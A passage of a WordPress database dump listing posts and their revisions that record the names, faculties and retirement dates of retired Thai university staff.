(119, 1, '2019-05-26 14:50:49', '2019-05-26 07:50:49', 'ผู้ช่วยศาสตราจารย์แมน  ธนาวุฒิ\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ผู้ช่วยศาสตราจารย์แมน  ธนาวุฒิ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%81%e0%b8%a1%e0%b8%99', '', '', '2019-05-26 14:50:49', '2019-05-26 07:50:49', '', 0, 'http://172.17.40.11/wp511/?p=119', 0, 'post', '', 0),
(120, 1, '2019-05-26 14:50:49', '2019-05-26 07:50:49', 'ผู้ช่วยศาสตราจารย์แมน  ธนาวุฒิ\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ผู้ช่วยศาสตราจารย์แมน  ธนาวุฒิ', '', 'inherit', 'closed', 'closed', '', '119-revision-v1', '', '', '2019-05-26 14:50:49', '2019-05-26 07:50:49', '', 119, 'http://172.17.40.11/wp511/?p=120', 0, 'revision', '', 0),
(121, 1, '2019-05-26 14:51:04', '2019-05-26 07:51:04', 'รองศาสตราจารย์ ดร.วิชิต  สังขรัตน์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'รองศาสตราจารย์ ดร.วิชิต  สังขรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b4%e0%b8%95', '', '', '2019-05-26 14:51:04', '2019-05-26 07:51:04', '', 0, 'http://172.17.40.11/wp511/?p=121', 0, 'post', '', 0),
(122, 1, '2019-05-26 14:51:04', '2019-05-26 07:51:04', 'รองศาสตราจารย์ ดร.วิชิต  สังขรัตน์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'รองศาสตราจารย์ ดร.วิชิต  สังขรัตน์', '', 'inherit', 'closed', 'closed', '', '121-revision-v1', '', '', '2019-05-26 14:51:04', '2019-05-26 07:51:04', '', 121, 'http://172.17.40.11/wp511/?p=122', 0, 'revision', '', 0),
(123, 1, '2019-05-26 14:51:22', '2019-05-26 07:51:22', 'ผู้ช่วยศาสตราจารย์สุนันท์  พิพัฒน์เพ็ญ\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ผู้ช่วยศาสตราจารย์สุนันท์  พิพัฒน์เพ็ญ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%b1', '', '', '2019-05-26 14:51:22', '2019-05-26 07:51:22', '', 0, 'http://172.17.40.11/wp511/?p=123', 0, 'post', '', 0),
(124, 1, '2019-05-26 14:51:22', '2019-05-26 07:51:22', 'ผู้ช่วยศาสตราจารย์สุนันท์  พิพัฒน์เพ็ญ\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ผู้ช่วยศาสตราจารย์สุนันท์  พิพัฒน์เพ็ญ', '', 'inherit', 'closed', 'closed', '', '123-revision-v1', '', '', '2019-05-26 14:51:22', '2019-05-26 07:51:22', '', 123, 'http://172.17.40.11/wp511/?p=124', 0, 'revision', '', 0),
(125, 1, '2019-05-26 14:51:35', '2019-05-26 07:51:35', 'รองศาสตราจารย์ปรีดา  สังขเกษม\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'รองศาสตราจารย์ปรีดา  สังขเกษม', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b5%e0%b8%94%e0%b8%b2-%e0%b8%aa%e0%b8%b1', '', '', '2019-05-26 14:51:35', '2019-05-26 07:51:35', '', 0, 'http://172.17.40.11/wp511/?p=125', 0, 'post', '', 0),
(126, 1, '2019-05-26 14:51:35', '2019-05-26 07:51:35', 'รองศาสตราจารย์ปรีดา  สังขเกษม\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'รองศาสตราจารย์ปรีดา  สังขเกษม', '', 'inherit', 'closed', 'closed', '', '125-revision-v1', '', '', '2019-05-26 14:51:35', '2019-05-26 07:51:35', '', 125, 'http://172.17.40.11/wp511/?p=126', 0, 'revision', '', 0),
(127, 1, '2019-05-26 14:51:53', '2019-05-26 07:51:53', 'ดร.จรินทร์  ชาติรุ่ง\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ดร.จรินทร์  ชาติรุ่ง', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%a3-%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c-%e0%b8%8a%e0%b8%b2%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b8%e0%b9%88%e0%b8%87', '', '', '2019-05-26 14:51:53', '2019-05-26 07:51:53', '', 0, 'http://172.17.40.11/wp511/?p=127', 0, 'post', '', 0),
(128, 1, '2019-05-26 14:51:53', '2019-05-26 07:51:53', 'ดร.จรินทร์  ชาติรุ่ง\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ดร.จรินทร์  ชาติรุ่ง', '', 'inherit', 'closed', 'closed', '', '127-revision-v1', '', '', '2019-05-26 14:51:53', '2019-05-26 07:51:53', '', 127, 'http://172.17.40.11/wp511/?p=128', 0, 'revision', '', 0),
(129, 1, '2019-05-26 14:52:07', '2019-05-26 07:52:07', 'อาจารย์บุญลือ  ซ้ายขวัญ\r\n\r\nเกษียณอายุราชการ วันที่  30 กันยายน 2538', 'อาจารย์บุญลือ  ซ้ายขวัญ', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9a%e0%b8%b8%e0%b8%8d%e0%b8%a5%e0%b8%b7%e0%b8%ad-%e0%b8%8b%e0%b9%89%e0%b8%b2%e0%b8%a2%e0%b8%82%e0%b8%a7%e0%b8%b1%e0%b8%8d', '', '', '2019-05-26 14:52:07', '2019-05-26 07:52:07', '', 0, 'http://172.17.40.11/wp511/?p=129', 0, 'post', '', 0),
(130, 1, '2019-05-26 14:52:07', '2019-05-26 07:52:07', 'อาจารย์บุญลือ  ซ้ายขวัญ\r\n\r\nเกษียณอายุราชการ วันที่  30 กันยายน 2538', 'อาจารย์บุญลือ  ซ้ายขวัญ', '', 'inherit', 'closed', 'closed', '', '129-revision-v1', '', '', '2019-05-26 14:52:07', '2019-05-26 07:52:07', '', 129, 'http://172.17.40.11/wp511/?p=130', 0, 'revision', '', 0),
(131, 1, '2019-05-26 14:52:20', '2019-05-26 07:52:20', 'อาจารย์วรรณี  เหล่าสุวรรณ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2538', 'อาจารย์วรรณี  เหล่าสุวรรณ', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%b5-%e0%b9%80%e0%b8%ab%e0%b8%a5%e0%b9%88%e0%b8%b2%e0%b8%aa%e0%b8%b8%e0%b8%a7%e0%b8%a3', '', '', '2019-05-26 14:52:20', '2019-05-26 07:52:20', '', 0, 'http://172.17.40.11/wp511/?p=131', 0, 'post', '', 0),
(132, 1, '2019-05-26 14:52:20', '2019-05-26 07:52:20', 'อาจารย์วรรณี  เหล่าสุวรรณ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2538', 'อาจารย์วรรณี  เหล่าสุวรรณ', '', 'inherit', 'closed', 'closed', '', '131-revision-v1', '', '', '2019-05-26 14:52:20', '2019-05-26 07:52:20', '', 131, 'http://172.17.40.11/wp511/?p=132', 0, 'revision', '', 0),
(133, 1, '2019-05-26 14:52:34', '2019-05-26 07:52:34', 'ผู้ช่วยศาสตราจารย์สาโรจน์  นาคะวิโรจน์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2538', 'ผู้ช่วยศาสตราจารย์สาโรจน์  นาคะวิโรจน์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b2%e0%b9%82%e0%b8%a3', '', '', '2019-05-26 14:52:34', '2019-05-26 07:52:34', '', 0, 'http://172.17.40.11/wp511/?p=133', 0, 'post', '', 0),
(134, 1, '2019-05-26 14:52:34', '2019-05-26 07:52:34', 'ผู้ช่วยศาสตราจารย์สาโรจน์  นาคะวิโรจน์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2538', 'ผู้ช่วยศาสตราจารย์สาโรจน์  นาคะวิโรจน์', '', 'inherit', 'closed', 'closed', '', '133-revision-v1', '', '', '2019-05-26 14:52:34', '2019-05-26 07:52:34', '', 133, 'http://172.17.40.11/wp511/?p=134', 0, 'revision', '', 0),
(135, 1, '2019-05-26 14:52:46', '2019-05-26 07:52:46', 'ผู้ช่วยศาสตราจารย์วิชิต  หลักทรัพย์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2538', 'ผู้ช่วยศาสตราจารย์วิชิต  หลักทรัพย์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b4', '', '', '2019-05-26 14:52:46', '2019-05-26 07:52:46', '', 0, 'http://172.17.40.11/wp511/?p=135', 0, 'post', '', 0),
(136, 1, '2019-05-26 14:52:46', '2019-05-26 07:52:46', 'ผู้ช่วยศาสตราจารย์วิชิต  หลักทรัพย์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2538', 'ผู้ช่วยศาสตราจารย์วิชิต  หลักทรัพย์', '', 'inherit', 'closed', 'closed', '', '135-revision-v1', '', '', '2019-05-26 14:52:46', '2019-05-26 07:52:46', '', 135, 'http://172.17.40.11/wp511/?p=136', 0, 'revision', '', 0),
(137, 1, '2019-05-26 14:52:59', '2019-05-26 07:52:59', 'ผู้ช่วยศาสตราจารย์นพศักดิ์  บุญรัศมี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'ผู้ช่วยศาสตราจารย์นพศักดิ์  บุญรัศมี', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%9e%e0%b8%a8%e0%b8%b1', '', '', '2019-05-26 14:52:59', '2019-05-26 07:52:59', '', 0, 'http://172.17.40.11/wp511/?p=137', 0, 'post', '', 0),
(138, 1, '2019-05-26 14:52:59', '2019-05-26 07:52:59', 'ผู้ช่วยศาสตราจารย์นพศักดิ์  บุญรัศมี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'ผู้ช่วยศาสตราจารย์นพศักดิ์  บุญรัศมี', '', 'inherit', 'closed', 'closed', '', '137-revision-v1', '', '', '2019-05-26 14:52:59', '2019-05-26 07:52:59', '', 137, 'http://172.17.40.11/wp511/?p=138', 0, 'revision', '', 0),
(139, 1, '2019-05-26 14:53:15', '2019-05-26 07:53:15', 'ผู้ช่วยศาสตราจารย์แนม  บุญญาสะอาด\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'ผู้ช่วยศาสตราจารย์แนม  บุญญาสะอาด', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%81%e0%b8%99%e0%b8%a1', '', '', '2019-05-26 14:53:15', '2019-05-26 07:53:15', '', 0, 'http://172.17.40.11/wp511/?p=139', 0, 'post', '', 0),
(140, 1, '2019-05-26 14:53:15', '2019-05-26 07:53:15', 'ผู้ช่วยศาสตราจารย์แนม  บุญญาสะอาด\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'ผู้ช่วยศาสตราจารย์แนม  บุญญาสะอาด', '', 'inherit', 'closed', 'closed', '', '139-revision-v1', '', '', '2019-05-26 14:53:15', '2019-05-26 07:53:15', '', 139, 'http://172.17.40.11/wp511/?p=140', 0, 'revision', '', 0),
(141, 1, '2019-05-26 14:53:37', '2019-05-26 07:53:37', 'รองศาสตราจารย์ประพันธ์  เตละกุล\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'รองศาสตราจารย์ประพันธ์  เตละกุล', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2019-05-26 14:53:37', '2019-05-26 07:53:37', '', 0, 'http://172.17.40.11/wp511/?p=141', 0, 'post', '', 0),
(142, 1, '2019-05-26 14:53:37', '2019-05-26 07:53:37', 'รองศาสตราจารย์ประพันธ์  เตละกุล\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'รองศาสตราจารย์ประพันธ์  เตละกุล', '', 'inherit', 'closed', 'closed', '', '141-revision-v1', '', '', '2019-05-26 14:53:37', '2019-05-26 07:53:37', '', 141, 'http://172.17.40.11/wp511/?p=142', 0, 'revision', '', 0),
(143, 1, '2019-05-26 14:53:52', '2019-05-26 07:53:52', 'ผู้ช่วยศาสตราจารย์มาลี  ไชยประสิทธิ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'ผู้ช่วยศาสตราจารย์มาลี  ไชยประสิทธิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a1%e0%b8%b2%e0%b8%a5%e0%b8%b5', '', '', '2019-05-26 14:53:52', '2019-05-26 07:53:52', '', 0, 'http://172.17.40.11/wp511/?p=143', 0, 'post', '', 0),
(144, 1, '2019-05-26 14:53:52', '2019-05-26 07:53:52', 'ผู้ช่วยศาสตราจารย์มาลี  ไชยประสิทธิ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'ผู้ช่วยศาสตราจารย์มาลี  ไชยประสิทธิ์', '', 'inherit', 'closed', 'closed', '', '143-revision-v1', '', '', '2019-05-26 14:53:52', '2019-05-26 07:53:52', '', 143, 'http://172.17.40.11/wp511/?p=144', 0, 'revision', '', 0),
(145, 1, '2019-05-26 14:54:08', '2019-05-26 07:54:08', 'อาจารย์ละออ  นิลมานัต\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'อาจารย์ละออ  นิลมานัต', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a5%e0%b8%b0%e0%b8%ad%e0%b8%ad-%e0%b8%99%e0%b8%b4%e0%b8%a5%e0%b8%a1%e0%b8%b2%e0%b8%99%e0%b8%b1%e0%b8%95', '', '', '2019-05-26 14:54:08', '2019-05-26 07:54:08', '', 0, 'http://172.17.40.11/wp511/?p=145', 0, 'post', '', 0),
(146, 1, '2019-05-26 14:54:08', '2019-05-26 07:54:08', 'อาจารย์ละออ  นิลมานัต\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'อาจารย์ละออ  นิลมานัต', '', 'inherit', 'closed', 'closed', '', '145-revision-v1', '', '', '2019-05-26 14:54:08', '2019-05-26 07:54:08', '', 145, 'http://172.17.40.11/wp511/?p=146', 0, 'revision', '', 0),
(147, 1, '2019-05-26 14:54:22', '2019-05-26 07:54:22', 'รองศาสตราจารย์อำไพ  โสรัจจะพันธ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'รองศาสตราจารย์อำไพ  โสรัจจะพันธ์', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%b3%e0%b9%84%e0%b8%9e-%e0%b9%82%e0%b8%aa%e0%b8%a3', '', '', '2019-05-26 14:54:22', '2019-05-26 07:54:22', '', 0, 'http://172.17.40.11/wp511/?p=147', 0, 'post', '', 0),
(148, 1, '2019-05-26 14:54:22', '2019-05-26 07:54:22', 'รองศาสตราจารย์อำไพ  โสรัจจะพันธ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2541', 'รองศาสตราจารย์อำไพ  โสรัจจะพันธ์', '', 'inherit', 'closed', 'closed', '', '147-revision-v1', '', '', '2019-05-26 14:54:22', '2019-05-26 07:54:22', '', 147, 'http://172.17.40.11/wp511/?p=148', 0, 'revision', '', 0),
(149, 1, '2019-05-26 14:54:35', '2019-05-26 07:54:35', 'ผู้ช่วยศาสตราจารย์เสถียร  ศรีรัตน์\r\n\r\nสังกัด คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์เสถียร  ศรีรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%aa%e0%b8%96%e0%b8%b5', '', '', '2019-05-26 14:54:35', '2019-05-26 07:54:35', '', 0, 'http://172.17.40.11/wp511/?p=149', 0, 'post', '', 0),
(150, 1, '2019-05-26 14:54:35', '2019-05-26 07:54:35', 'ผู้ช่วยศาสตราจารย์เสถียร  ศรีรัตน์\r\n\r\nสังกัด คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์เสถียร  ศรีรัตน์', '', 'inherit', 'closed', 'closed', '', '149-revision-v1', '', '', '2019-05-26 14:54:35', '2019-05-26 07:54:35', '', 149, 'http://172.17.40.11/wp511/?p=150', 0, 'revision', '', 0),
(151, 1, '2019-05-26 14:56:17', '2019-05-26 07:56:17', 'ผู้ช่วยศาสตราจารย์ฉลวย  พร้อมมูล\r\n\r\nสังกัด คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์ฉลวย  พร้อมมูล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%89%e0%b8%a5%e0%b8%a7%e0%b8%a2', '', '', '2019-05-26 14:56:17', '2019-05-26 07:56:17', '', 0, 'http://172.17.40.11/wp511/?p=151', 0, 'post', '', 0),
(152, 1, '2019-05-26 14:56:17', '2019-05-26 07:56:17', 'ผู้ช่วยศาสตราจารย์ฉลวย  พร้อมมูล\r\n\r\nสังกัด คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์ฉลวย  พร้อมมูล', '', 'inherit', 'closed', 'closed', '', '151-revision-v1', '', '', '2019-05-26 14:56:17', '2019-05-26 07:56:17', '', 151, 'http://172.17.40.11/wp511/?p=152', 0, 'revision', '', 0),
(153, 1, '2019-05-26 14:56:31', '2019-05-26 07:56:31', 'ผู้ช่วยศาสตราจารย์ฉลอง  พร้อมมูล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์ฉลอง  พร้อมมูล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%89%e0%b8%a5%e0%b8%ad%e0%b8%87', '', '', '2019-05-26 14:56:31', '2019-05-26 07:56:31', '', 0, 'http://172.17.40.11/wp511/?p=153', 0, 'post', '', 0),
(154, 1, '2019-05-26 14:56:31', '2019-05-26 07:56:31', 'ผู้ช่วยศาสตราจารย์ฉลอง  พร้อมมูล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์ฉลอง  พร้อมมูล', '', 'inherit', 'closed', 'closed', '', '153-revision-v1', '', '', '2019-05-26 14:56:31', '2019-05-26 07:56:31', '', 153, 'http://172.17.40.11/wp511/?p=154', 0, 'revision', '', 0),
(155, 1, '2019-05-26 14:56:43', '2019-05-26 07:56:43', 'ผู้ช่วยศาสตราจารย์สนอง  สุวรรณวงศ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์สนอง  สุวรรณวงศ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%99%e0%b8%ad%e0%b8%87', '', '', '2019-05-26 14:56:43', '2019-05-26 07:56:43', '', 0, 'http://172.17.40.11/wp511/?p=155', 0, 'post', '', 0),
(156, 1, '2019-05-26 14:56:43', '2019-05-26 07:56:43', 'ผู้ช่วยศาสตราจารย์สนอง  สุวรรณวงศ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์สนอง  สุวรรณวงศ์', '', 'inherit', 'closed', 'closed', '', '155-revision-v1', '', '', '2019-05-26 14:56:43', '2019-05-26 07:56:43', '', 155, 'http://172.17.40.11/wp511/?p=156', 0, 'revision', '', 0),
(157, 1, '2019-05-26 14:56:56', '2019-05-26 07:56:56', 'อาจารย์อุบล  สุวรรณวงศ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์อุบล  สุวรรณวงศ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%b8%e0%b8%9a%e0%b8%a5-%e0%b8%aa%e0%b8%b8%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%a7%e0%b8%87%e0%b8%a8%e0%b9%8c', '', '', '2019-05-26 14:56:56', '2019-05-26 07:56:56', '', 0, 'http://172.17.40.11/wp511/?p=157', 0, 'post', '', 0),
(158, 1, '2019-05-26 14:56:56', '2019-05-26 07:56:56', 'อาจารย์อุบล  สุวรรณวงศ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์อุบล  สุวรรณวงศ์', '', 'inherit', 'closed', 'closed', '', '157-revision-v1', '', '', '2019-05-26 14:56:56', '2019-05-26 07:56:56', '', 157, 'http://172.17.40.11/wp511/?p=158', 0, 'revision', '', 0),
(159, 1, '2019-05-26 14:57:10', '2019-05-26 07:57:10', 'ผู้ช่วยศาสตราจารย์สนิท  บุญฤทธิ์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์สนิท  บุญฤทธิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%99%e0%b8%b4%e0%b8%97', '', '', '2019-05-26 14:57:10', '2019-05-26 07:57:10', '', 0, 'http://172.17.40.11/wp511/?p=159', 0, 'post', '', 0),
(160, 1, '2019-05-26 14:57:10', '2019-05-26 07:57:10', 'ผู้ช่วยศาสตราจารย์สนิท  บุญฤทธิ์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์สนิท  บุญฤทธิ์', '', 'inherit', 'closed', 'closed', '', '159-revision-v1', '', '', '2019-05-26 14:57:10', '2019-05-26 07:57:10', '', 159, 'http://172.17.40.11/wp511/?p=160', 0, 'revision', '', 0),
(161, 1, '2019-05-26 14:57:23', '2019-05-26 07:57:23', 'ผู้ช่วยศาสตราจารย์อรุณ  วงศ์พลาย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์อรุณ  วงศ์พลาย', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%a3%e0%b8%b8%e0%b8%93', '', '', '2019-05-26 14:57:23', '2019-05-26 07:57:23', '', 0, 'http://172.17.40.11/wp511/?p=161', 0, 'post', '', 0),
(162, 1, '2019-05-26 14:57:23', '2019-05-26 07:57:23', 'ผู้ช่วยศาสตราจารย์อรุณ  วงศ์พลาย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์อรุณ  วงศ์พลาย', '', 'inherit', 'closed', 'closed', '', '161-revision-v1', '', '', '2019-05-26 14:57:23', '2019-05-26 07:57:23', '', 161, 'http://172.17.40.11/wp511/?p=162', 0, 'revision', '', 0),
